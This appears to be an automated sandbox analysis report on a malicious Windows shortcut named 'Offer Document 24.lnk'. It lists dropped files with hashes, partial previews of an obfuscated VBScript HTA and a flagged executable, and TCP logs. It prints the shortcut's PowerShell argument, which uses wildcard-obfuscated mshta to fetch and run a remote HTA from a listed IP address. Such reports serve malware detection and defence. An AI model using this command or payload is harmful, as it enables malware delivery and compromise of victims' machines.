                                                          Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x180ee149, page size 16384, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1048576
                                                          Entropy (8bit):0.7865131351279094
                                                          Encrypted:false
                                                          SSDEEP:1536:DSB2ESB2SSjlK/IECXK0I9XGJCTgzEYkr3g16t2UPkLk+k0+lKuy9nyS2kILzsL6:DazauEezm2U
                                                          MD5:9D050E0C21720225E51D0B5918FF7137
                                                          SHA1:9642C03517903CBD0BE2BB82BAE812D6DF74E51E
                                                          SHA-256:69B9C60DE039601EBBA09BA4F75C12A0B940A8D7674F1B02522241D7EC7865EB
                                                          SHA-512:4F110CF4F9E7AD1AB410EF29AF9B404703E0E49FBA8B07A959454D1C3D4215A7EBE58C6C5EEE7DB16F771D570B13D39D5CB5C0DA5FC8B8438144803AD0C9B27F
                                                          Malicious:false
                                                          Preview:...I... ...............X\...;...{......................0.}..... ....|U......|..h.z..... ....|U.0.}.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................... ....|U..................4.. ....|U..........................#......0.}.....................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.07999604096520356
                                                          Encrypted:false
                                                          SSDEEP:3:o/OetYeGZZwIjEauOG/h1o//okEAllmn/lZOPp3lll:orzsHjEahGPoLEAiD
                                                          MD5:BC5E0EC47C1F92DB0F74BED89A7B7FD8
                                                          SHA1:6C5BA65A47B1EB0C625438398FCAB57C605D4AD7
                                                          SHA-256:EFB513A082E32357B0F26011E3CEA4B64395CDC4A84382F1A68B96D4FD297F2D
                                                          SHA-512:58871484E8F407D8241B44B015E1D02041F259301E38FD987728C03306053FE98D4FBC29A04EF6FCB3C26B5E634C8D17C3E5F1E0BEC7C23060D12C6CC9F24365
                                                          Malicious:false
                                                          Preview:..g......................................;...{.......|.. ....|U......... ....|.. ....|U.JP.. ....|...................4.. ....|U.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\mshta.exe
                                                          File Type:HTML document, ASCII text, with very long lines (9201), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10160
                                                          Entropy (8bit):3.5378539212072178
                                                          Encrypted:false
                                                          SSDEEP:192:QSc8pfJ204eoWujo+tVo1oLfbAJkJ9M5f29:BcgonouoC
                                                          MD5:409F1BADA32D81974FD8606BE4CBC943
                                                          SHA1:4F96439F62C66A965A76AAF76A1D3D902CB37EC3
                                                          SHA-256:44973EB6E87B61951A5244AAB9CF1FC9D04D2D97AB9EC6914C56B54F3D3B7743
                                                          SHA-512:F9F54C6D75C1380FAA10A20FA5338B99E5B3AF31262479043F828F926CBAE008F51FF97C0F875CDB2B54E87FB4ABE5DC6F4AA2E5A3235D45B4E498AF750392B0
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:<head>..<script language="vBsCRIPT">................Function JbqAFPcwHw(ByVal FCsS).. Dim sPiEEhGWpPdkU.. Dim UUUqe.. UUUqe = 39341.. Dim IJGsNySrV.. IJGsNySrV = JbfCu(FCsS).. If IJGsNySrV = 7000 + 1204 Then.. For Each sPiEEhGWpPdkU In FCsS.. Dim rOZiH.. rOZiH = rOZiH & Chr(sPiEEhGWpPdkU - UUUqe).. Next.. End If.. JbqAFPcwHw = rOZiH..End Function................Function UiwrQqNceuOJO().. Dim FCsS.. Dim nlbWVu.. FCsS = Array(39453,39452,39460,39442,39455,39456,39445,39442,39449,39449,39387,39442,39461,39442,39373,39386,39410,39461,39442,39440,39458,39457,39446,39452,39451,39421,39452,39449,39446,39440,39462,39373,39426,39451,39423,39442,39456,39457,39455,39446,39440,39457,39442,39441,39373,39443,39458,39451,39440,39457,39446,39452,39451,39373,39417,39422,39445,39449,39445,39381,39377,39446,39406,39429,39420,39426,39451,39447,39422,39385,39373,39377,39439,39447,39412,39440,39413,39410,39439,39382,39464,39432,39414,39420,39387,39411,39446,39449,3
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................
                                                          Process:C:\Windows\SysWOW64\netbtugc.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1209886597424439
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4530
                                                          Entropy (8bit):3.779978483889475
                                                          Encrypted:false
                                                          SSDEEP:48:ZjNWZecr/Ysl2fYl1XSogZoAAfYsl2fYleXSogZoA01:Z5cecjYsl2fYCHxmYsl2fYzHxu
                                                          MD5:C703A0478C587F9A2D85F5F5E7EBAD69
                                                          SHA1:31A8D9F7037869B9974E85376AFC4B9CA7D6D05C
                                                          SHA-256:3DDBE81D3D2382C16C48C75EC2A64771BE89BF5FE43105AD4108C24297DE0D02
                                                          SHA-512:5E9B35B1CC26F7568BF27DCDE2D302F97EF3466029803BF919DC14AD0FB0B0379270DE76BB6B0582835509B49135B5B3CD115FE0FAFF976C13096A1A5A0ED236
                                                          Malicious:false
                                                          Preview:...................................FL..................F. .. ......g.....9.=.......=...B............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd..."y..g.....9.=.....x.2.B....X.. .OFFERD~1.LNK..\......EW.D.X.......$....................l.#.O.f.f.e.r. .D.o.c.u.m.e.n.t. .2.4...l.n.k.......\...............-.......[............i.......C:\Users\user\Desktop\Offer Document 24.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......414408...........hT..CrF.f4... .UC..Yc...,...E...hT..CrF.f4... .UC..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH.X......3........................W.i.n.d.o.w.s.....Z.1......X....System32..B......OwH.X................................S.y.s.t.e.m.3.2..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4530
                                                          Entropy (8bit):3.779978483889475
                                                          Encrypted:false
                                                          SSDEEP:48:ZjNWZecr/Ysl2fYl1XSogZoAAfYsl2fYleXSogZoA01:Z5cecjYsl2fYCHxmYsl2fYzHxu
                                                          MD5:C703A0478C587F9A2D85F5F5E7EBAD69
                                                          SHA1:31A8D9F7037869B9974E85376AFC4B9CA7D6D05C
                                                          SHA-256:3DDBE81D3D2382C16C48C75EC2A64771BE89BF5FE43105AD4108C24297DE0D02
                                                          SHA-512:5E9B35B1CC26F7568BF27DCDE2D302F97EF3466029803BF919DC14AD0FB0B0379270DE76BB6B0582835509B49135B5B3CD115FE0FAFF976C13096A1A5A0ED236
                                                          Malicious:false
                                                          Preview:...................................FL..................F. .. ......g.....9.=.......=...B............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd..."y..g.....9.=.....x.2.B....X.. .OFFERD~1.LNK..\......EW.D.X.......$....................l.#.O.f.f.e.r. .D.o.c.u.m.e.n.t. .2.4...l.n.k.......\...............-.......[............i.......C:\Users\user\Desktop\Offer Document 24.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......414408...........hT..CrF.f4... .UC..Yc...,...E...hT..CrF.f4... .UC..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH.X......3........................W.i.n.d.o.w.s.....Z.1......X....System32..B......OwH.X................................S.y.s.t.e.m.3.2..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):270848
                                                          Entropy (8bit):7.9613773331731865
                                                          Encrypted:false
                                                          SSDEEP:6144:ZhKO/bBUzpHw6Zw4KKmnZlypy0s1LNbDlLJkEU:ZhKYd8HthKKNy0sX1HU
                                                          MD5:1DCCE19E1A6306424D073487AF821FF0
                                                          SHA1:9DE500775811F65415266689CBDFD035E167F148
                                                          SHA-256:77E14CAAE3DAF05C1F5A6A3D10E4936CC58944D6AE9EC6943B1BE6D995E94B5C
                                                          SHA-512:4528EFD164BFF904830FDE7EFB04D5CF3999EF4FA0B8C3D4AD0407D7CD75F03085107C8AE5651E015F62E414A59979FD264E94257C52F60540D5969FD4CA144A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Preview:MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L....h._..................................... ....@.......................... ............@..........................................................................................................................................................text............................... ..`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):55
                                                          Entropy (8bit):4.306461250274409
                                                          Encrypted:false
                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                          Malicious:false
                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                          File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                          Entropy (8bit):3.287501535033788
                                                          TrID:
                                                          • Windows Shortcut (20020/1) 100.00%
                                                          File name:Offer Document 24.lnk
                                                          File size:1'090 bytes
                                                          MD5:bf9569f5e56e6dcb1f4ae60fd2faea36
                                                          SHA1:1085e4140bf323df085db50b8f79c3b02b4aab72
                                                          SHA256:59f149ffc55554ce0aac7072bba999b5abb83b023486e017f407883f8a27e4e2
                                                          SHA512:2a682c59a881c95d36d56d28328253f3c8cc6ac3d466c5eefa1223cb58a12de708414a5e6f59e07f919c9e122748deb76961c1e84ec4c3e19f68afdf4cc032d9
                                                          SSDEEP:12:8MFm/3BVSXvk44X3ojsqzKtnWN5W+UcCsvXLCKeXX3UWKDiN33YlNPeVnI:8l/BHYVKVWq+/CW7C7n3CaHKPeFI
                                                          TLSH:4C11F51C0EE65725E676C739A8BAB322C9363C46EE424F9E01D096846468211F5A5F2F
                                                          File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                          Icon Hash:74f0e4e4e4e1e1ed

                                                          General

                                                          Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Command Line Argument:. $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
                                                          Icon location:shell32.dll
                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          05/23/24-20:20:12.581519TCP2024449ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl4970580192.168.2.820.86.128.223
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 23, 2024 20:20:12.524291992 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:12.581159115 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:12.581255913 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:12.581518888 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:12.661428928 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.193768024 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.193788052 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.193964005 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:13.195055008 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.195071936 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.195141077 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:13.197567940 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.197649002 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:13.210746050 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.210764885 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.210779905 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.210794926 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.210808992 CEST804970520.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:13.210829973 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:13.210866928 CEST4970580192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:16.531404972 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:16.540168047 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:16.540266991 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:16.545011044 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:16.558128119 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.156924009 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.157037973 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.157118082 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.157419920 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.157764912 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.157777071 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.157823086 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.158113003 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.158127069 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.158138990 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.158160925 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.158198118 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.159049034 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.161684036 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.161739111 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.164158106 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.164463997 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.164508104 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.168992043 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.218678951 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.246062994 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.246077061 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.246176958 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.246401072 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.246980906 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.246994019 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.247045994 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.247210979 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.247253895 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.247545958 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.247857094 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.247924089 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.248131037 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.248295069 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.248347998 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.248974085 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.249085903 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.249130964 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.249320030 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.249631882 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.249677896 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.250754118 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.250771046 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.250818014 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.251526117 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.251812935 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.251825094 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.251854897 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.252125978 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.252175093 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.252914906 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.253241062 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.253252029 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.253297091 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.309859037 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.309966087 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.310029030 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.311932087 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.335122108 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.335200071 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.335335016 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.335561991 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.335606098 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.335751057 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.336009026 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.336021900 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.336034060 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.336047888 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.336075068 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.336678982 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.336865902 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.336913109 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.337084055 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.337096930 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.337187052 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.337207079 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.337481976 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.337493896 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.337523937 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.337951899 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.338005066 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.338195086 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.338521004 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.338534117 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.338565111 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.339250088 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.339262962 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.339273930 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.339301109 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.339327097 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.339425087 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.339776039 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.339827061 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.339869022 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.340086937 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.340101004 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.340131044 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.340572119 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.340620041 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.340807915 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.341033936 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.341089010 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.341295958 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.341309071 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.341360092 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.342046022 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.390547037 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.398845911 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.398966074 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.399027109 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.399122953 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.399337053 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.399403095 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.401293039 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.424017906 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.424072027 CEST4970680192.168.2.820.86.128.223
                                                          May 23, 2024 20:20:17.424159050 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.424338102 CEST804970620.86.128.223192.168.2.8
                                                          May 23, 2024 20:20:17.424350977 CEST804970620.86.128.223192.168.2.8
